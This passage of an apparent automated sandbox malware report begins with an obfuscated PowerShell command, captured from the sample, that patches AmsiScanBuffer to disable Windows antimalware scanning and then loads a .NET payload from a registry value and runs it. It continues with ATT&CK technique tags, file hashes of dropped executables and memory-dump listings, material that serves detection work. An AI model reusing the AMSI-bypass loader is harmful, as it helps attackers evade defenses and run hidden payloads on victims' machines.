@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UTsbqgGIbUn=$zCGfyCURtPZrg.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+'u'+'l'+[Char](101)+''+'H'+''+'a'+'nd'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$DjpcqsSeahDCvI=$URFIYjEflZYrSe.Invoke($Null,@([Object]$UTsbqgGIbUn,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+'b'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$NzsdUYxAanJjBXmeQ=$URFIYjEflZYrSe.Invoke($Null,@([Object]$UTsbqgGIbUn,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+'r'+''+'o'+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$YmeFRhX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DjpcqsSeahDCvI,$QTBqfSiCGQsUswBykzE).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+'dl'+'l'+'');$hNIeSSgwPYuxVZatO=$URFIYjEflZYrSe.Invoke($Null,@([Object]$YmeFRhX,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+'B'+[Char](117)+'f'+'f'+''+[Char](101)+'r')));$xKMLaFRkqs=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NzsdUYxAanJjBXmeQ,$gdPxQmAiKzRFOUisgEJDTx).Invoke($hNIeSSgwPYuxVZatO,[uint32]8,4,[ref]$xKMLaFRkqs);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hNIeSSgwPYuxVZatO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NzsdUYxAanJjBXmeQ,$gdPxQmAiKzRFOUisgEJDTx).Invoke($hNIeSSgwPYuxVZatO,[uint32]8,0x20,[ref]$xKMLaFRkqs);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+[Char](100)+''+[Char](105)+'al'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:4996

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{48012321-eddf-4b85-bc2e-1e5a709e3778}
1⤵
PID:1304

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
3746452a52ad7d0919544b9b3bba169c

SHA1
1c00fb5185399b4f5847678e1e88def064502b6f

SHA256
27897da892c686239056be56b31ef13babb14db403886d6e2b84e800fb327a80

SHA512
4bf852772e19584556a078909732eb73e97699ea1aa3d20bbe18c42f52319ed0ea6ae9326e811861cd178a054111d2042d862f2a2ebce8f8aa95aa728dca6405

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
01da2da534effaed9e626e59df56ffa0

SHA1
fcf7d6f01be189ed3e689034053636a6dac1da68

SHA256
8f461f4e484f7da9acd2490fa7dd654349738fca725a512a9e37d030db972a99

SHA512
97a086ba81642753fbd16ad2c8a783c56f0a9f47513093f27c1ebf2c6e1855fdd642b300bf7be4852958b660568289f2f66584b29245dca1b80de8162112bdcb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
1cc990f8d493539c6d997ff983e18380

SHA1
b1eaa5a009741fc1bc1d404d48e2e24807407d1a

SHA256
7d022751d4c597c2372e2738e48aaf7a3ff008f888160e996798cc5b63ba8122

SHA512
280857957549ca9aa371c53f58db221d81b8d393244f7e13fcfd7a2eb5f96c1ae2c98eaf2aaddfa3761edcde629890755de54b7888fccc64a36de506ede94610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
20a76d44ad3b099ab47ecd14a118dba5

SHA1
cb2dcd6395f859076f35add5c0c89735c3113697

SHA256
ab65318aa9947b39bc55134719655bed7dc923a1652a43886d1f87ef25dd8219

SHA512
ee6d632e142cffa4f0a61fdd125b62458093a20dbd83eee135e31ed833a313141bdbc39dac7cf934d6bdda200da76c84a18c96f38d69bd03a6137e917a221465

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
bd4563b69dbd21c5d9fc4da751e770f8

SHA1
a12ba6517b38cab069f10842a60d4939878045da

SHA256
701c7dc9e0570a57c7b3d1520cd43623521f2559f72c107cbf2cda5c221e621b

SHA512
179e8a628ea6ffcd3aab94122cd535fef8abfcc48830086f60ab3caf96e536b1ece351cb26ac71a063c74e6acaba8ba8e4f8302811af3f960a05702895a11052

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
20babb24a369089be430823ad2a78dcd

SHA1
80ff6ff6ef0b3396b5bc6d310caac1594d9f3dec

SHA256
66f254a0d2e1299b5f7eb5413493eae31ab1e8b59c48770cea32ada30d3f0d32

SHA512
7ed1709a722735d9c6862a6ec45271be4c8613b3f4cb9e419037bb51911b26765567b107f833ab6abe06695fb9193148ff8aa109b48a7ddd30c2d00a38d71e55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
c910eaf7d75d6d011c01389c0fdb9aa6

SHA1
004f0d99626778b34d4c537532c4c01ec6dc7086

SHA256
a5fa2313541e16edaa585224ca6471f9dd04e9b44fab1ce86b161f49a9f02715

SHA512
d2818914ac2153aaaa71db1f3534c87e72b9701ccb98554dbb09b0ce982e1ae17e2d6e61fdab994693f41a424494255c7c7ddc1757c7b40f8af41eb15b26c416

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
66b767affbdacb187528cdd33c56b792

SHA1
32b149ec3b010cfe715ca23c0309628fc34c0c5b

SHA256
0178e0893bd8720deafc612de2722ff215e325b1484a0ce87fcfde6dcb625127

SHA512
c26f14b3f70c23314dddcd1884c4c09849516ef9ddd6e7269379c174a3af85527a0f78636f01be05fe9c81fad97b4ffa73c44ad2b64e91933f16cc7bba3e8629

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
4cd2bb97856ca01a8fc6a4f0217dbadc

SHA1
be6422a4c79ca0edf793ac977836ab54b18721d7

SHA256
14ca288a7d5cb43c4fed8e11e5fa5e1b34c5d617717ae21af878b0fe139b89ed

SHA512
6019ad3f4644bd2d79a9065fe6d86353094275085c5b693e3de436a3a7acf44107366b5af0c865386d567bbc94db1ea255ddf83354165cca1f6b08f86b3b2cdb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
f4827942cd92fa0d56b8dd17b8329378

SHA1
902ebc3cc6c924a92f638014efbbbcc52daa9a1b

SHA256
e330727be64a8190324eb0821d9e6966885ca557117148c7361fe9acc8558be5

SHA512
f695ac633130297cbfc6d34aa12a790dd2df41fb627eb81d8c01103a2ac859df0a744de00949099027a39911c000174def2039308baaaf92f5213bc4153f15d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
da94b700ec4c0d84cd1a33ccad7ada80

SHA1
9f4db6d151a22838961166331edded08551d61ba

SHA256
735bbb14cc25c02bafb7b77e4d141637b8d5cba661e1dd6db10f94651ae8fa42

SHA512
1339bf892b60c63bf7fd3d6d0dafc1f9bcb669eeba50e9b364c603b2aff734e3a0a02a03354391de450b809e3d75be5bd84b0c163e76717b57d50991536f523b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
136B

MD5
4c8be2b8cd46fc8957ae27121c0be186

SHA1
8a6cfe9458ab005b1fddd4ab906911f549e78795

SHA256
a631985f149b52ac072126e1f25dbc81e3eae21d042fc5cb562fd68c1275d834

SHA512
ab24251cbe4b1308ed5f56d1a1f45df8d67eed5dec45046159f265fc2b384e9ca78a439e7cce9566f78bc1f9e09a46e6667e879619fe2a4f0b226cb2b77c5781

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
b3981d812c526dce58341364d82965d4

SHA1
1328f78ac792426a29a334302a5e4046095ae41b

SHA256
bfabeb109c1465ef27a9fce5620074b4e1055412d6a3609c6c79bdef5738c72f

SHA512
d775193c62177e2f1ac83311c4b2471444a5628ae00dd80eb4c18edefc3a5c6316a4fc9e86f2923f9f6a311672305dcefc4c747d34f73dd679cfed4e0d43ef47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000151021\test.cmd
Filesize
414B

MD5
0f9c7a5644d304f9d127747ed7ef60ae

SHA1
1d410981c199198a7db3e3957ed73bca3082e91b

SHA256
760b1b6b7c5527515f3f36fb74b5cc30e31864a201cffa971326c9dc8d046c6a

SHA512
8c2b435c7f1e3cdb023346cef159584ce8b0f87f437dfe6670bf5a8391a4e763cffe3280b05af9e10dfefccf8941d374a93d0e12b7697a072a740bec40275d86

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000151021\test.cmd
Filesize
414B

MD5
0f9c7a5644d304f9d127747ed7ef60ae

SHA1
1d410981c199198a7db3e3957ed73bca3082e91b

SHA256
760b1b6b7c5527515f3f36fb74b5cc30e31864a201cffa971326c9dc8d046c6a

SHA512
8c2b435c7f1e3cdb023346cef159584ce8b0f87f437dfe6670bf5a8391a4e763cffe3280b05af9e10dfefccf8941d374a93d0e12b7697a072a740bec40275d86

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
Filesize
30KB

MD5
e85b025a7d074abc82a9d3eea402e1e5

SHA1
7ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d

SHA256
26bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2

SHA512
c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s3umupun.t4y.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\1000157020\test.cmd
Filesize
414B

MD5
0f9c7a5644d304f9d127747ed7ef60ae

SHA1
1d410981c199198a7db3e3957ed73bca3082e91b

SHA256
760b1b6b7c5527515f3f36fb74b5cc30e31864a201cffa971326c9dc8d046c6a

SHA512
8c2b435c7f1e3cdb023346cef159584ce8b0f87f437dfe6670bf5a8391a4e763cffe3280b05af9e10dfefccf8941d374a93d0e12b7697a072a740bec40275d86

Download Submit
C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe
Filesize
3.7MB

MD5
b0a84e4330a9c00c57d3a3e7885f7946

SHA1
bfe5f9b94081c25827e2bc90bb39a8c701033519

SHA256
6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04

SHA512
a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f

Download Submit
C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe
Filesize
3.7MB

MD5
b0a84e4330a9c00c57d3a3e7885f7946

SHA1
bfe5f9b94081c25827e2bc90bb39a8c701033519

SHA256
6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04

SHA512
a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f

Download Submit
C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe
Filesize
3.7MB

MD5
b0a84e4330a9c00c57d3a3e7885f7946

SHA1
bfe5f9b94081c25827e2bc90bb39a8c701033519

SHA256
6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04

SHA512
a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f

Download Submit
memory/300-630-0x00007FFD185B0000-0x00007FFD185C0000-memory.dmp

Filesize
64KB

Download
memory/300-626-0x000001BF95360000-0x000001BF95387000-memory.dmp

Filesize
156KB

Download
memory/484-637-0x00000175E1710000-0x00000175E1737000-memory.dmp

Filesize
156KB

Download
memory/484-642-0x00007FFD185B0000-0x00007FFD185C0000-memory.dmp

Filesize
64KB

Download
memory/588-615-0x00000203E0030000-0x00000203E0051000-memory.dmp

Filesize
132KB

Download
memory/588-620-0x00007FFD185B0000-0x00007FFD185C0000-memory.dmp

Filesize
64KB

Download
memory/588-617-0x00000203E0060000-0x00000203E0087000-memory.dmp

Filesize
156KB

Download
memory/676-619-0x000001E155E30000-0x000001E155E57000-memory.dmp

Filesize
156KB

Download
memory/676-623-0x00007FFD185B0000-0x00007FFD185C0000-memory.dmp

Filesize
64KB

Download
memory/736-644-0x00007FFD185B0000-0x00007FFD185C0000-memory.dmp

Filesize
64KB

Download
memory/736-640-0x00000212F6B60000-0x00000212F6B87000-memory.dmp

Filesize
156KB

Download
memory/752-652-0x00007FFD185B0000-0x00007FFD185C0000-memory.dmp

Filesize
64KB

Download
memory/764-389-0x0000000070240000-0x000000007028C000-memory.dmp

Filesize
304KB

Download
memory/764-386-0x0000000005030000-0x0000000005040000-memory.dmp

Filesize
64KB

Download
memory/764-387-0x0000000005030000-0x0000000005040000-memory.dmp

Filesize
64KB

Download
memory/764-412-0x000000007F670000-0x000000007F680000-memory.dmp

Filesize
64KB

Download
memory/944-413-0x0000000070240000-0x000000007028C000-memory.dmp

Filesize
304KB

Download
memory/944-410-0x0000000002B10000-0x0000000002B20000-memory.dmp

Filesize
64KB

Download
memory/944-436-0x000000007FA90000-0x000000007FAA0000-memory.dmp

Filesize
64KB

Download
memory/944-411-0x0000000002B10000-0x0000000002B20000-memory.dmp

Filesize
64KB

Download
memory/956-632-0x00007FFD185B0000-0x00007FFD185C0000-memory.dmp

Filesize
64KB

Download
memory/956-627-0x000002597F1A0000-0x000002597F1C7000-memory.dmp

Filesize
156KB

Download
memory/1080-650-0x0000022AD77D0000-0x0000022AD77F7000-memory.dmp

Filesize
156KB

Download
memory/1080-653-0x00007FFD185B0000-0x00007FFD185C0000-memory.dmp

Filesize
64KB

Download
memory/1108-656-0x000002410EA30000-0x000002410EA57000-memory.dmp

Filesize
156KB

Download
memory/1108-658-0x00007FFD185B0000-0x00007FFD185C0000-memory.dmp

Filesize
64KB

Download
memory/1208-661-0x000001916CBD0000-0x000001916CBF7000-memory.dmp

Filesize
156KB

Download
memory/1304-604-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1304-606-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1304-607-0x00007FFD58530000-0x00007FFD58725000-memory.dmp

Filesize
2.0MB

Download
memory/1304-610-0x00007FFD57CE0000-0x00007FFD57D9E000-memory.dmp

Filesize
760KB

Download
memory/1400-137-0x0000000005600000-0x000000000560A000-memory.dmp

Filesize
40KB

Download
memory/1400-178-0x0000000005710000-0x0000000005720000-memory.dmp

Filesize
64KB

Download
memory/1400-139-0x0000000005710000-0x0000000005720000-memory.dmp

Filesize
64KB

Download
memory/1400-133-0x0000000000B70000-0x0000000000B92000-memory.dmp

Filesize
136KB

Download
memory/1400-136-0x0000000005720000-0x00000000057BC000-memory.dmp

Filesize
624KB

Download
memory/1400-135-0x0000000005540000-0x00000000055D2000-memory.dmp

Filesize
584KB

Download
memory/1400-134-0x0000000005BB0000-0x0000000006154000-memory.dmp

Filesize
5.6MB

Download
memory/1420-338-0x00000000029C0000-0x00000000029D0000-memory.dmp

Filesize
64KB

Download
memory/1420-364-0x000000007F6D0000-0x000000007F6E0000-memory.dmp

Filesize
64KB

Download
memory/1420-342-0x0000000070240000-0x000000007028C000-memory.dmp

Filesize
304KB

Download
memory/1420-339-0x00000000029C0000-0x00000000029D0000-memory.dmp

Filesize
64KB

Download
memory/1420-340-0x00000000029C0000-0x00000000029D0000-memory.dmp

Filesize
64KB

Download
memory/1480-304-0x0000000005340000-0x0000000005350000-memory.dmp

Filesize
64KB

Download
memory/1480-291-0x0000000070240000-0x000000007028C000-memory.dmp

Filesize
304KB

Download
memory/1480-288-0x0000000005340000-0x0000000005350000-memory.dmp

Filesize
64KB

Download
memory/1480-290-0x0000000005340000-0x0000000005350000-memory.dmp

Filesize
64KB

Download
memory/2648-579-0x00007FF69BD80000-0x00007FF69BDA9000-memory.dmp

Filesize
164KB

Download
memory/2924-193-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/2924-194-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/2924-191-0x0000000000510000-0x000000000051E000-memory.dmp

Filesize
56KB

Download
memory/2924-192-0x0000000005030000-0x0000000005086000-memory.dmp

Filesize
344KB

Download
memory/3304-434-0x0000000002780000-0x0000000002790000-memory.dmp

Filesize
64KB

Download
memory/3304-435-0x0000000002780000-0x0000000002790000-memory.dmp

Filesize
64KB

Download
memory/3304-437-0x0000000070240000-0x000000007028C000-memory.dmp

Filesize
304KB

Download
memory/3312-302-0x0000000002700000-0x0000000002710000-memory.dmp

Filesize
64KB

Download
memory/3312-303-0x0000000002700000-0x0000000002710000-memory.dmp

Filesize
64KB

Download
memory/3312-326-0x0000000002700000-0x0000000002710000-memory.dmp

Filesize
64KB

Download
memory/3312-327-0x000000007FBA0000-0x000000007FBB0000-memory.dmp

Filesize
64KB

Download
memory/3312-315-0x0000000070240000-0x000000007028C000-memory.dmp

Filesize
304KB

Download
memory/4016-252-0x0000000070240000-0x000000007028C000-memory.dmp

Filesize
304KB

Download
memory/4016-249-0x00000000054C0000-0x00000000054D0000-memory.dmp

Filesize
64KB

Download
memory/4016-250-0x00000000054C0000-0x00000000054D0000-memory.dmp

Filesize
64KB

Download
memory/4016-285-0x00000000054C0000-0x00000000054D0000-memory.dmp

Filesize
64KB

Download
memory/4484-479-0x00007FF65B660000-0x00007FF65BA21000-memory.dmp

Filesize
3.8MB

Download
memory/4484-578-0x00007FF65B660000-0x00007FF65BA21000-memory.dmp

Filesize
3.8MB

Download
memory/4796-202-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4796-245-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4796-223-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4796-220-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4796-210-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4796-204-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4796-248-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4796-201-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4796-199-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4796-280-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4796-287-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4952-175-0x0000000007350000-0x0000000007358000-memory.dmp

Filesize
32KB

Download
memory/4952-168-0x0000000002380000-0x0000000002390000-memory.dmp

Filesize
64KB

Download
memory/4952-138-0x00000000023E0000-0x0000000002416000-memory.dmp

Filesize
216KB

Download
memory/4952-142-0x0000000002380000-0x0000000002390000-memory.dmp

Filesize
64KB

Download
memory/4952-141-0x0000000002380000-0x0000000002390000-memory.dmp

Filesize
64KB

Download
memory/4952-140-0x0000000005020000-0x0000000005648000-memory.dmp

Filesize
6.2MB

Download
memory/4952-143-0x0000000004D60000-0x0000000004D82000-memory.dmp

Filesize
136KB

Download
memory/4952-174-0x0000000007370000-0x000000000738A000-memory.dmp

Filesize
104KB

Download
memory/4952-173-0x0000000007260000-0x000000000726E000-memory.dmp

Filesize
56KB

Download
memory/4952-172-0x00000000072A0000-0x0000000007336000-memory.dmp

Filesize
600KB

Download
memory/4952-171-0x0000000007090000-0x000000000709A000-memory.dmp

Filesize
40KB

Download
memory/4952-170-0x0000000007020000-0x000000000703A000-memory.dmp

Filesize
104KB

Download
memory/4952-169-0x0000000007660000-0x0000000007CDA000-memory.dmp

Filesize
6.5MB

Download
memory/4952-150-0x00000000056C0000-0x0000000005726000-memory.dmp

Filesize
408KB

Download
memory/4952-167-0x00000000062B0000-0x00000000062CE000-memory.dmp

Filesize
120KB

Download
memory/4952-157-0x0000000070090000-0x00000000700DC000-memory.dmp

Filesize
304KB

Download
memory/4952-156-0x00000000062F0000-0x0000000006322000-memory.dmp

Filesize
200KB

Download
memory/4952-155-0x0000000005D20000-0x0000000005D3E000-memory.dmp

Filesize
120KB

Download
memory/4952-144-0x0000000005650000-0x00000000056B6000-memory.dmp

Filesize
408KB

Download
memory/4996-603-0x00007FFD57CE0000-0x00007FFD57D9E000-memory.dmp

Filesize
760KB

Download
memory/4996-602-0x00007FFD58530000-0x00007FFD58725000-memory.dmp

Filesize
2.0MB

Download
memory/5068-362-0x0000000002990000-0x00000000029A0000-memory.dmp

Filesize
64KB

Download
memory/5068-363-0x0000000002990000-0x00000000029A0000-memory.dmp

Filesize
64KB

Download
memory/5068-365-0x0000000070240000-0x000000007028C000-memory.dmp

Filesize
304KB

Download
memory/5068-388-0x000000007FC70000-0x000000007FC80000-memory.dmp

Filesize
64KB

Download